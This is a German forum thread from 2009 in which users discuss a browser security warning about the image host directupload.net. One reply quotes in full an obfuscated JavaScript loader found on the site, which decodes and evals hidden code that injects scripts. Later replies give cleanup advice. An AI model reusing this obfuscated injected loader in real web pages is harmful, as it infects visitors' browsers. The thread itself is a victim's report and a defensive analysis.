directupload.net - attackierende Seite ?!

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Got2Be, 10. November 2009 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. #1 10. November 2009
    es geht um meinen lieblings bilder hoster - Kostenlos Bilder hochladen - Dein Upload Service

    vorhin hab ich ien bild hochgeladen und dann kam dieser mist hier

    {bild down}

    {bild down}


    irrt sich dieser seltsame googleratgeber (den ich noch nie zuvor gesehen habe geschweige denn iwie gewollt habe) oder ist da wirklich was dran ?
     
  2. #2 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    Google hat da schon recht. Auf der Seite findet sich folgender Javascript-Code:

    Code:
    <script language="javascript">$a="Z63cZ3dZ22ds.leZ256eZ2567tZ2568;i+Z252b)Z257btmpZ253dds.Z2573licZ2565(i,Z2569Z252b1)Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bZ2564Z2562+Z2564cZ252bdZ2564Z252bZ2564eZ252c1Z2530Z2529;Z2564Z2577(Z2573tZ2529Z253bsZ2574Z253d$aZ253bZ2522;Z22;cbZ3dZ22apZ2565Z2528dZ2573Z2529;Z2573tZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;Z2569Z253cZ22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewudTqdu890;Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kcxyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeubiZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564cs(Z2563u,Z25314Z2529Z2529;Z2522;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566unZ2563tZ2569on Z2564wZ2528t)Z257bcZ2561Z253dZ2527Z252564Z25256fcuZ256dZ252565nt.Z252577riZ2574Z25256Z2535Z252528Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ25256Z2539pZ2574Z252520Z256cZ2561Z25256eZ2567uZ252561Z2567Z252565Z25253dZ25255cZ252522jaZ2576Z252561Z252573Z2563Z252572Z252569pZ25257Z2534Z25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570Z252574Z25253eZ2527;eZ2576alZ2528uZ256eesZ2563apeZ2528t))Z257d;Z22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;ceZ3dZ22Z2563harZ2543oZ2564Z2565At(Z2530)Z255e(Z25270Z257800Z2527+esZ2529))Z253bZ257d}Z22;cdZ3dZ22;Z2573tZ253dZ2573Z2574+Z2553triZ256eg.fZ2572omCZ2568arCZ256fdZ2565((Z2574mp.Z22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257aZ2528cZ257a)Z257brZ2565tuZ2572n Z2563aZ252bZ2563Z2562+Z2563c+cZ2564+cZ2565Z252bcz;Z257dZ253bZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256ecZ2574ioZ256eZ2520Z2564cZ2573(dsZ252cZ2565sZ2529Z257bdsZ253dunesZ2563Z22;Z69fZ20(doZ63umZ65ntZ2eZ63oZ6fZ6bieZ2einZ64exZ4fZ66(Z27rfZ35f6Z64Z73Z27)Z3dZ3d-1)Z7bfuncZ74ioZ6e cZ61llZ62aZ63k(Z78)Z7b wiZ6edowZ2etw Z3dZ20xZ3bZ73Z63(Z27rf5fZ36dZ73Z27,2,7)Z3beZ76al(Z75nZ65scaZ70e(dZ7a+Z63Z7a+opZ2bsZ74)Z2bZ27Z64wZ28dzZ2bZ63z(Z24aZ2bsZ74)Z29Z3bZ27);Z64oZ63umeZ6eZ74Z2ewZ72Z69Z74eZ28Z24a);Z7ddZ6fZ63Z75mZ65ntZ2ewriZ74e(Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearcZ68.Z74witZ74erZ2ecoZ6dZ2fimageZ73Z2fsearcZ68Z2frss.pZ6egZ27 widtZ68Z3d1 hZ65Z69gZ68tZ3d1 Z73tyZ6ceZ3dZ27visibiZ6cityZ3ahidZ64eZ6eZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61nguZ61geZ3djaZ76aZ73crZ69ptZ22+Z22 srcZ3dZ27hZ74tZ70:Z2fZ2fseZ61rchZ2eZ74wiZ74tZ65r.Z63Z6fZ6dZ2ftrendsZ2fZ77Z65Z65kZ6cZ79.jZ73Z6fnZ3fcalZ6cbaZ63Z6bZ3dcallbZ61ck&Z65xZ63ludZ65Z3dZ68asZ68tagZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$aZ3dZ27Z27};fuZ6ectiZ6fn sZ63Z28cnmZ2cv,Z65d)Z7bvZ61Z72Z20exZ64Z3dnew DZ61Z74Z65();Z65Z78Z64Z2esZ65tDaZ74Z65(eZ78Z64.gZ65tDaZ74Z65()Z2bedZ29;Z64oZ63uZ6dZ65ntZ2eZ63oZ6fkieZ3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27Z3bZ65Z78Z70irZ65sZ3dZ27+exdZ2etZ6fGMTZ53Z74rZ69nZ67Z28)Z3bZ7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>
    Sieht ganz nach einem Code zum Ausnutzen einer Browser-Lücke aus. Ich würde die Seite meiden.
     
  3. #3 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    danke, wird ab jetzt gemieden

    da ich jetzt vermutlich infiziert wurde, was soll ich machen ?
    gibs irgendwelche empfehlenswerten programme um den mist los zu bekommen ?

    will nicht so gerne formatieren ..
     
  4. #4 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    Du solltest ersteinmal klären, ob du überhaupt infiziert bist. Dazu am besten HijackThis benutzen.

    Die Google-Seite gibt ja an, dass es ein Trojaner sein soll. Mehr machen als HijackThis + Virenscann durchlaufen lassen kannst du aber erstmal nicht, man sieht dann ja ob sich das Problem erledigt oder ob du doch formatieren musst.
     
  5. #5 10. November 2009
    AW: directupload.net - attackierende Seite ?!

    hab hijackthis mal durchgeführt und ausgewertet , es wurde nichts gefunden außer einem eintrag den ich "fixen" sollte , hieß iwie goopher oder so kA


    naja scheint scih ja alles erledigt zu haben ich danke euch für die schnelle aufklärung
     

  6. Videos zum Thema
    Video Script
Die Seite wird geladen...

Ähnliche Themen mit den Stichworten: directupload net attackierende

  1. Antworten:
    0
    Aufrufe:
    515
  2. Antworten:
    2
    Aufrufe:
    750
  3. Festnetznummer generieren
    A.Reynolds, 10. Mai 2020 , im Forum: Elektrotechnik & Elektronik
    Antworten:
    2
    Aufrufe:
    1.313
  4. Streaming: Internet kurz vor Zusammenbruch?
    raid-rush, 22. März 2020 , im Forum: Netzwelt
    Antworten:
    1
    Aufrufe:
    2.753
  5. directupload.net
    action-reaction, 4. September 2010 , im Forum: Alltagsprobleme
    Antworten:
    1
    Aufrufe:
    537